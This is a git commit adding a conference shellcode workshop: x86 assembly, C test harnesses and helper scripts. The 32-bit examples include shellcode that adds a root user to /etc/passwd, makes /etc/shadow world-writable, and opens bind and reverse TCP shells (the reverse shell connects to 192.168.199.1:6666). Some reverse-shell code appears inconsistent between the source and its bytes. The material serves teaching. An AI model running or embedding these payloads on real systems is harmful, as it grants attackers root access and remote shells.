dash/Shellcode-Lab
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

New commit. Added also NetworkShells.

Browse Source
This commit is contained in:
Marco Lux
2017-02-01 13:15:17 +01:00
parent 5d7498d6bd
commit 8348a251e3
34 changed files with 802 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
README Normal file
View File

@@ -0,0 +1,16 @@
_____ __ __ ___ _ _ __ ___ ___ ___ _ ____ ____
/ ___/| | | / _]| | | | / ] / \ | \ / _] | | / || \
( \_ | | | / [_ | | | | / / | || \ / [_ _____ | | | o || o )
\__ || _ || _]| |___ | |___ / / | O || D || _] || |___ | || |
/ \ || | || [_ | || / \_ | || || [_|_____|| || _ || O |
\ || | || || || \ || || || | | || | || |
\___||__|__||_____||_____||_____|\____| \___/ |_____||_____| |_____||__|__||_____|
Collection of Shellcode Lab Sessions at from different cons the past years. Consists of PDF Slides and Example codes.
x86_32 - This is the Shellcode Lab for IA-32 saying 32Bit Intel CPUs
x86_64 - This is the Shellcode Lab for IA-64 saying 64Bit Intel CPUs
Cheers
dash

BIN
x86_32/0x1_SycallBasics/0x1_Shellcode-Lab_32Bit_Basics.pdf Normal file
View File

Binary file not shown.

53
x86_32/0x1_SycallBasics/Example_Code/adduser_etc_passwd.asm Normal file
View File

@@ -0,0 +1,53 @@
; shellcode lab @ hack4
; dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
mov eax, 5
push ebx
push 0x64777373
push 0x61702f63
push 0x74652f2f
mov ebx, esp
mov ecx, 0x401
int 0x80
; take filedescriptor
xor ebx, ebx
mov ebx, eax
; write(f_open, line, 24)
xor eax, eax
xor ecx, ecx
mov eax, 4
push ecx
push byte 0x0a
push 0x68736162
push 0x2f6e6962
push 0x2f3a746f
push 0x6f722f3a
push 0x3a303a30
push 0x3a494e73
push 0x386b5a39
push 0x65736d48
push 0x42413a72
push 0x336b6361
push 0x68316f6e
mov ecx, esp
mov edx, 45
int 0x80
;close maybe?? ah forget that :>
; exit(23)
mov eax, 1
mov ebx, 23
int 0x80

21
x86_32/0x1_SycallBasics/Example_Code/ascii_converter.py Normal file
View File

@@ -0,0 +1,21 @@
#!/usr/bin/env python
#
# ascii converter for shellcoding-lab at hack4
# ~dash in 2014
#
import sys
import binascii
text = sys.argv[1]
def usage():
print "./%s <string2convert>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
val = binascii.hexlify(text[::-1])
print "Stringlen: %d" % len(text)
print "String: %s" % val

29
x86_32/0x1_SycallBasics/Example_Code/ascii_converter2.py Normal file
View File

@@ -0,0 +1,29 @@
#!/usr/bin/env python
import sys
import binascii
text = sys.argv[1]
def usage():
print "./%s <string2convert>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
val = binascii.hexlify(text[::-1])
print "Stringlen: %d" % len(text)
print "String: %s" % val
print
for i in range(len(val)):
if i % 8 == 0:
print "push 0x",
print "\b%c" % val[i],
i=i+1
k = i % 8
if k == 0:
print

21
x86_32/0x1_SycallBasics/Example_Code/bad_setuid_shell.asm Normal file
View File

@@ -0,0 +1,21 @@
global _start
section .text
_start:
;setuid
xor eax, eax
mov ebx, eax
mov eax, 11
int 0x80
;execve
xor ecx, ecx
push ecx
push 0x69732f2f
push 0x6e69622f
mov ebx, esp
mov edx, 0x00000000
xor eax, eax
mov eax, 11
int 0x80

27
x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_0bytes.asm Normal file
View File

@@ -0,0 +1,27 @@
; shellcodelab@hack4
; by dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
;chmod
mov ecx, 0x1ff ;0777
push ebx ;null terminator
push 0x776f6461 ;/etc/shadow
push 0x68732f63
push 0x74652f2f
mov ebx, esp ;put the address of esp to ebx (shadow)
mov eax, 15
int 0x80
;exit
xor eax, eax
xor ebx, ebx
mov eax, 1
int 0x80

26
x86_32/0x1_SycallBasics/Example_Code/chmod_shadow_no0.asm Normal file
View File

@@ -0,0 +1,26 @@
; shellcode-lab@hack4
; by dash
BITS 32
global _start
_start:
xor eax, eax
xor ebx, ebx
xor ecx, ecx
;chmod
mov cx, 0x1ff ;0777
push ebx ;null terminator
push 0x776f6461 ;/etc/shadow
push 0x68732f63
push 0x74652f2f
mov ebx, esp ;put the address of esp to ebx (shadow)
mov al, 15
int 0x80
;exit
xor eax, eax
xor ebx, ebx
mov al, 1
int 0x80

19
x86_32/0x1_SycallBasics/Example_Code/crypt_des_tool.py Normal file
View File

@@ -0,0 +1,19 @@
#!/usr/bin/env python2
#
# crypt des tool for shellcoding lab at hack4
# ~dash
import sys
import crypt
def usage():
print "%s <password>" % (sys.argv[0])
if len(sys.argv)<2:
usage()
exit()
password = sys.argv[1]
pw = crypt.crypt(password,'AB')
print "Password: %s" % pw

20
x86_32/0x1_SycallBasics/Example_Code/shell.c Normal file
View File

@@ -0,0 +1,20 @@
/* shell.c
simple shell for shellcoding-lab at hack4 0x1
probably ripped somewhere
~dash
*/
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int main(){
char *args[2];
setuid(0);
args[0] = "/bin/sh";
args[1] = NULL;
execve(args[0], args, NULL);
}

26
x86_32/0x1_SycallBasics/Example_Code/skeleton_mmap.c Normal file
View File

@@ -0,0 +1,26 @@
#include <string.h>
#include <sys/mman.h>
char shellcode[] = "";
int main(int argc, char **argv)
{
// Allocate some read-write memory
void *mem = mmap(0, sizeof(shellcode), PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
// Copy the shellcode into the new memory
memcpy(mem, shellcode, sizeof(shellcode));
// Make the memory read-execute
mprotect(mem, sizeof(shellcode), PROT_READ|PROT_EXEC);
// Call the shellcode
int (*func)();
func = (int (*)())mem;
(int)(*func)();
// Now, if we managed to return here, it would be prudent to clean up the memory:
munmap(mem, sizeof(shellcode));
return 0;
}

15
x86_32/0x1_SycallBasics/Example_Code/skeleton_oldstyle.c Normal file
View File

@@ -0,0 +1,15 @@
#include <stdio.h>
#include <string.h>
#include <unistd.h>
char shellcode[] = "";
int main(void)
{
int *ret;
printf("%d\n",strlen(shellcode));
ret = (int *)&ret+2;
*ret = (int)shellcode;
return 0;
}

BIN
x86_32/0x2_NetworkShells/0x2_ShellcodeLab_32Bit_NetworkShells.pdf Normal file
View File

Binary file not shown.

115
x86_32/0x2_NetworkShells/bindshell_tcp/bindtcp.asm Normal file
View File

@@ -0,0 +1,115 @@
BITS 32
global _start
; basic bindshell for shellcode lab
; by dash
_start:
; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
; in difference we have to specify everything via socketcall
; int socketcall(int call, unsigned long *args);
; 66h / 102 is socketcall
; /usr/include/linux/net.h
; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
; its *not* sys/socket
; go to /usr/include/bits/socket.h for domain
; go to /usr/include/bits/socket_type.h for type
; go to /usr/include/netinet/in.h for protocol
; define socket
xor eax, eax ; clean accumulator
xor ebx, ebx
xor edx, edx ; prepare edx for null
mov al, 0x66
mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h)
push edx ; IPPROTO == 0
push 0x1 ; SOCK_STREAM == 1
push 0x2 ; AF_INET / PF_INET == 2
mov ecx,esp
int 0x80
; define bind
; EAX has socket fd
; /usr/include/linux/in.h
; #define __SOCK_SIZE__ 16 /* sizeof(struct sockaddr) */
; typedef unsigned short int sa_family_t;
; struct sockaddr {
; sa_family_t sa_family; unsigned short int 2 byte
; char sa_data[14]; }
; we do not want to specify a special ip address
; we simply define 0.0.0.0 with nulled register
xchg edi, eax
push edx ; 0.0.0.0
push word 0x0A1A ; PORT 6666
push word 0x2 ; AF_INET, sin_family
mov ecx, esp ; struct sockaddr *addr
mov esi, ecx ; save struct sockaddr for later use in ESI
push 0x10 ; socklen_t addrlen
push ecx ; sockaddr *addr
push edi ; socket fd
mov ecx, esp
mov bl,0x2 ; SYS_BIND
xor eax, eax ; clean accumulator
mov al,0x66 ; SYS_SOCKETCALL
int 0x80
; define listen
; do socketcall
; SYS_LISTEN 4
; int listen(int sockfd, int backlog);
;
xor eax, eax
mov al,0x66 ; SYS_SOCKETCALL
mov bl,0x4 ; SYS_LISTEN, 1st Argument to SYS_SOCKETCALL
push 0x1 ; backlog
push edi ; sockfd
mov ecx, esp ; 2nd argument to SYS_SOCKETCALL
int 0x80
; define accept
; SYS_ACCEPT 5
; int accept(int sockfd, struct sockaddr *addr,socklen_t *addrlen);
; addr + addrlen for client, but we dont care about that
xor eax, eax ; clean accumulator
mov al,0x66
mov bl,0x5
push edx ; flags, null
push edx
push edi
mov ecx, esp
int 0x80
; define dup2
; dup2 duplicate the FDs to the shell
; new sockfd is in EAX
; int dup2(int oldfd, int newfd);
xor ecx, ecx
mov cl,0x2
xchg ebx,eax
loop:
xor eax, eax ; clean accumulator
mov al,0x3F
int 0x80
dec ecx
jns loop ; if ecx is *not* -1 (SIGN Flag)
; define execve
; spawning a shell
; int execve(const char *filename, char *const argv[], char *const envp[]);
;
xor eax, eax ; clean accumulator
xor esi, esi
push esi
mov edx, esp ; 3rd argument
push esi ; NULL
push 0x68732f6e ; n/sh
push 0x69622f2f ; //bi
mov ebx, esp ; 1st argument
mov ecx, edx ; 2nd argument
mov al,0xb
int 0x80

15
x86_32/0x2_NetworkShells/bindshell_tcp/build_x86.sh Normal file
View File

@@ -0,0 +1,15 @@
#!/bin/bash
# easy build script for shellcode class
if [ $# -ne 1 ];
then
echo "what is the name of the sourcefile, without .asm please"
exit
fi
name=$1
nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
md5sum $name
ls -al $name
echo "Done"

12
x86_32/0x2_NetworkShells/bindshell_tcp/testit.c Normal file
View File

@@ -0,0 +1,12 @@
#include <stdio.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x31\xc0\xb0\x66\xb3\x04\x6a\x01\x57\x89\xe1\xcd\x80\x31\xc0\xb0\x66\xb3\x05\x52\x52\x57\x89\xe1\xcd\x80\x31\xc9\xb1\x02\x93\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

15
x86_32/0x2_NetworkShells/reverseshell_tcp/build_x86.sh Normal file
View File

@@ -0,0 +1,15 @@
#!/bin/bash
# easy build script for shellcode class
if [ $# -ne 1 ];
then
echo "what is the name of the sourcefile, without .asm please"
exit
fi
name=$1
nasm -f elf32 $name.asm -o $name.o;ld -m elf_i386 -o $name $name.o
md5sum $name
ls -al $name
echo "Done"

78
x86_32/0x2_NetworkShells/reverseshell_tcp/revtcp.asm Normal file
View File

@@ -0,0 +1,78 @@
BITS 32
global _start
; basic reverseshell for shellcode lab
; by dash
_start:
; all syscalls /usr/include/i386-linux-gnu/asm/unistd_32.h
; in difference we have to specify everything via socketcall
; int socketcall(int call, unsigned long *args);
; 66h / 102 is socketcall
; /usr/include/linux/net.h
; we need a socket, PF_INET, SOCK_STREAM, IPPROTO
; its *not* sys/socket
; go to /usr/include/bits/socket.h for domain
; go to /usr/include/bits/socket_type.h for type
; go to /usr/include/netinet/in.h for protocol
; define socket
xor eax, eax ; clean accumulator
xor ebx, ebx ; clean it as well
xor edx, edx ; prepare edx for null
mov al, 0x66 ; put 102 into AL, sys_socketcall
mov bl, 0x1 ; SYS_SOCKET (/usr/include/linux/net.h)
push edx ; IPPROTO == 0
push 0x1 ; SOCK_STREAM == 1
push 0x2 ; AF_INET / PF_INET == 2
mov ecx,esp
int 0x80
; connect
; call is basically the same as bind
;xchg edi, eax
push 0x01C7A8C0 ; 192.168.199.1
push word 0x0A1A ; PORT 6666
push word 0x2 ; AF_INET, sin_family
mov ecx, esp ; struct sockaddr *addr
mov esi, ecx ; save struct sockaddr for later use in ESI
push 0x10 ; socklen_t addrlen
push ecx ; sockaddr *addr
push edi ; socket fd
mov ecx, esp
mov bl,0x3 ; SYS_CONNECT
xor eax, eax ; clean accumulator
mov al,0x66 ; SYS_SOCKETCALL
int 0x80
; define dup2
; dup2 duplicate the FDs to the shell
; new sockfd is in EAX
; int dup2(int oldfd, int newfd);
xor ecx, ecx
mov cl,0x2
mov ebx,edi
loop:
xor eax, eax ; clean accumulator
mov al,0x3F
int 0x80
dec ecx
jns loop ; if ecx is *not* -1 (SIGN Flag)
; define execve
; spawning a shell
; int execve(const char *filename, char *const argv[], char *const envp[]);
;
xor eax, eax ; clean accumulator
xor esi, esi
push esi
mov edx, esp ; 3rd argument
push esi ; NULL
push 0x68732f6e ; n/sh
push 0x69622f2f ; //bi
mov ebx, esp ; 1st argument
mov ecx, edx ; 2nd argument
mov al,0xb
int 0x80

12
x86_32/0x2_NetworkShells/reverseshell_tcp/testit.c Normal file
View File

@@ -0,0 +1,12 @@
#include <stdio.h>
unsigned char shellcode[] = \
"\x31\xc0\x31\xdb\x31\xd2\xb0\x66\xb3\x01\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80\x97\x52\x66\x68\x1b\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x02\x31\xc0\xb0\x66\xcd\x80\x68\xc0\xa8\xc7\x67\x66\x68\x1a\x0a\x66\x6a\x02\x89\xe1\x89\xce\x6a\x10\x51\x57\x89\xe1\xb3\x03\x31\xc0\xb0\x66\xcd\x80\x31\xc9\xb1\x02\x89\xfb\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf7\x31\xc0\x31\xf6\x56\x89\xe2\x56\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", sizeof(shellcode) - 1);
int (*ret)() = (int(*)())shellcode;
ret();
}

18
x86_64/Example_Code/8bit.asm Normal file
View File

@@ -0,0 +1,18 @@
; 8 bit registers 'undocumented', test
; dash@hack4.org
; May 2016
;
; wikipedia, shellcode trainings no access to certain cpu registers in 8 bit mode
; however, they are addressable
; just adding right now a l to 16bit registers
;
BITS 64
global _start
_start:
mov spl, 1
mov bpl, 2
mov sil, 3
mov dil, 4

22
x86_64/Example_Code/byte_placement_r10.asm Normal file
View File

@@ -0,0 +1,22 @@
; shellcode-lab64bit
; dash@hack4.org
; byte placements on 64 bit - example for new register r10
BITS 64
global _start
_start:
; former general purpose register
sub r10, r10
mov r10, 0x4142434445464748
sub r10, r10
mov r10d, 0x41424344
sub r10d, r10d
mov r10w, 0x4142
sub r10w, r10w
mov r10b,0x42
sub r10b, r10b

28
x86_64/Example_Code/byte_placement_rax.asm Normal file
View File

@@ -0,0 +1,28 @@
; shellcode-lab64bit
; dash@hack4.org
; byte placements on 64 bit - example
BITS 64
global _start
_start:
; former general purpose register, example
; sub is used to clear out the register
sub rax, rax
mov rax, 0x4142434445464748
sub rax, rax
mov eax, 0x41424344
sub eax, eax
; address 16bit
mov ax, 0x4142
; overwrite the higher byte of ax
; 0x4142 gets to 0x2d42
mov ah,0x2d
sub ah, ah
mov al,0x41
sub al, al

22
x86_64/Example_Code/clear_register.asm Normal file
View File

@@ -0,0 +1,22 @@
; shellcode-lab64
; dash@hack4.org
;
; some example to zero-out a register
BITS 64
global _start
_start:
xor rax, rax ; initial clearing - classic xor
mov rax, 0xDEADBEEF
sub rax, rax ; sub opcode
mov rax, 0xF00DBABE
xor rax, rax ; classic xor
; check value of register and add or sub from that
; let's assume 29A is in the register rcx
sub rcx, rcx
mov rcx, 0x29A
sub rcx, 666
; zero'd

21
x86_64/Example_Code/execve.asm Normal file
View File

@@ -0,0 +1,21 @@
BITS 64
global _start
_start:
xor rax, rax
push rax ; null terminator for the string
mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
push rbx ;
mov rdi, rsp ; move address from stack pointer to first argument
push rax
push rdi ; actually we would not need this one
mov rsi, rsp ; move the address to the 2nd argument
mov rdx, rax ; no envp necessary
mov al,0x3B ; execve into rax
syscall

29
x86_64/Example_Code/execve_setuid.asm Normal file
View File

@@ -0,0 +1,29 @@
BITS 64
global _start
_start:
xor rax, rax
push rax ; push the cleared register
pop rdi ; pop the zer0z into 1st argument
add al,0x69 ; setuid 105 or 0x69h
syscall ; call setuid(0)
xor rax, rax
push rax ; null terminator for the string
mov rbx, 0x68732f6e69622f2f ; //bin/sh backwards
push rbx ;
mov rdi, rsp ; move address from stack pointer to first argument
push rax
push rdi ; actually we would not need this one
mov rsi, rsp ; move the address to the 2nd argument
mov rdx, rax ; no envp necessary
mov al,0x3B ; execve into rax
syscall

14
x86_64/Example_Code/exit.asm Normal file
View File

@@ -0,0 +1,14 @@
; shellcode lab 64Bit
; exit example as it should be ;)
; dsah@hack4.org
;
BITS 64
global _start
_start:
xor rax,rax
xor rdx,rdx
mov al,0x3C
mov dil,4
syscall

16
x86_64/Example_Code/exit_nulls.asm Normal file
View File

@@ -0,0 +1,16 @@
; shellcode-lab 64Bit
; dash@hack4.org
; exit code with null bytes
;
BITS 64
global _start
_start:
xor rax,rax
xor rdx,rdx
mov rax,0x3C
mov rdx,4
syscall

27
x86_64/Example_Code/kill.asm Normal file
View File

@@ -0,0 +1,27 @@
; shellcode-lab 64Bit
; dash@hack4.org
; kill + exit
;
BITS 64
global _start
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
mov dil, 1368
mov sil,9
mov al, 62
syscall
xor rax, rax
xor rdi, rdi
add dil, 4
mov al, 60
syscall

18
x86_64/Example_Code/kill_noexit.asm Normal file
View File

@@ -0,0 +1,18 @@
; shellcode-lab64bit
; dash@hack4.org
; don't execute that as root, as long as adjusted
;
BITS 64
global _start
_start:
xor rax, rax
xor rdi, rdi
xor rsi, rsi
mov dil, 1 ; you might not want to run that as root
mov sil,9
mov al, 62
syscall

16
x86_64/Example_Code/push.asm Normal file
View File

@@ -0,0 +1,16 @@
; shellcode-lab64
; dash@hack4.org
; push example and 8byte fun on 64bit architecture
;
BITS 64
global _start
_start:
push byte 0x41
push word 0x4142
push dword 0x41424344
; let's comment that out
; comment it in to see the compile error
;push 0x4142434445464748

14
x86_64/Example_Code/push_mov.asm Normal file
View File

@@ -0,0 +1,14 @@
; shellcode-lab64
; dash@hack4.org
; push example and 8byte fun on 64bit architecture
; use mov to bring up your 8byte value on the stack
;
BITS 64
global _start
_start:
xor rax, rax ; clear register
mov rax, 0x4142434445464748 ; place 8byte in register rax
push rax ; push it onto the stack

17
x86_64/Example_Code/skeleton.c Normal file
View File

@@ -0,0 +1,17 @@
/* shellcode-lab 64Bit
dash@hack4.org
use -z execstack
or set char code to const
*/
#include <stdio.h>
#include <string.h>
unsigned char code[] ="shellcode wants to be placed here!";
main()
{
printf("Shellcode Len: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

20
x86_64/Example_Code/xchg.asm Normal file
View File

@@ -0,0 +1,20 @@
; xchg example code
; dash@hack4.org
; shellcode lab
; may 2016
BITS 64
global _start
_start:
xor rax, rax
xor rbx, rbx
mov rax, 0x29A ; http://web.textfiles.com/ezines/29A/
mov rbx, 0x539
mov r10, 0xBEEFBEEFBEEFBEEF
xchg rax, r10
xchg r10, r9
xchg rbx, rax
xchg rdi,rsp

BIN
x86_64/Shellcode-Lab64_0x01.pdf Normal file
View File

Binary file not shown.